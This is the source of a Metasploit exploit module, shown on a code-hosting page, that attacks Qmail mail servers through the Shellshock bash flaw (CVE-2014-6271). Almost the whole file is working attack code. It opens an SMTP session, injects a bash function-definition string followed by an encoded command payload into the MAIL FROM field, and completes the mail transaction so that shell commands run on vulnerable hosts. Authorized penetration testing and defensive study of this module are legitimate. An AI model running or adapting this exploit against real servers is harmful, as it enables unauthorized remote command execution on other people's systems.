Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Smtp910def initialize(info={})11super(update_info(info,12'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',13'Description' => %q{14This module exploits a shellshock vulnerability on Qmail, a public15domain MTA written in C that runs on Unix systems.16Due to the lack of validation on the MAIL FROM field, it is possible to17execute shell code on a system with a vulnerable BASH (Shellshock).18This flaw works on the latest Qmail versions (qmail-1.03 and19netqmail-1.06).20However, in order to execute code, /bin/sh has to be linked to bash21(usually default configuration) and a valid recipient must be set on the22RCPT TO field (usually [email protected]).23The exploit does not work on the "qmailrocks" community version24as it ensures the MAILFROM field is well-formed.25},26'Author' =>27[28'Mario Ledo (Metasploit module)',29'Gabriel Follon (Metasploit module)',30'Kyle George (Vulnerability discovery)'31],32'License' => MSF_LICENSE,33'Platform' => ['unix'],34'Arch' => ARCH_CMD,35'References' =>36[37['CVE', '2014-6271'],38['CWE', '94'],39['OSVDB', '112004'],40['EDB', '34765'],41['URL', 'https://seclists.org/oss-sec/2014/q3/649'],42['URL', 'https://lists.gt.net/qmail/users/138578']43],44'Payload' =>45{46'BadChars' => "\x3e",47'Space' => 888,48'DisableNops' => true,49'Compat' =>50{51'PayloadType' => 'cmd',52'RequiredCmd' => 'generic telnet perl ruby python'53# telnet ruby python and perl works only if installed on target54}55},56'Targets' => [ [ 'Automatic', { }] ],57'DefaultTarget' => 0,58'DisclosureDate' => '2014-09-24'59))6061deregister_options('MAILFROM')62end6364def smtp_send(data = nil)65begin66result = ''67code = 068sock.put("#{data}")69result = sock.get_once70result.chomp! if (result)71code = result[0..2].to_i if result72return result, code73rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError74return result, 075rescue ::Exception => e76print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")77return nil, 078end79end8081def exploit82to = datastore['MAILTO']83connect84result = smtp_send("HELO localhost\r\n")85if result[1] < 200 || result[1] > 30086fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))87end88print_status('Sending the payload...')89result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")90if result[1] < 200 || result[1] > 30091fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))92end93print_status("Sending RCPT TO #{to}")94result = smtp_send("rcpt to:<#{to}>\r\n")95if result[1] < 200 || result[1] > 30096fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))97end98result = smtp_send("data\r\n")99if result[1] < 200 || result[1] > 354100fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))101end102result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")103if result[1] < 200 || result[1] > 300104fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))105end106disconnect107end108end109110111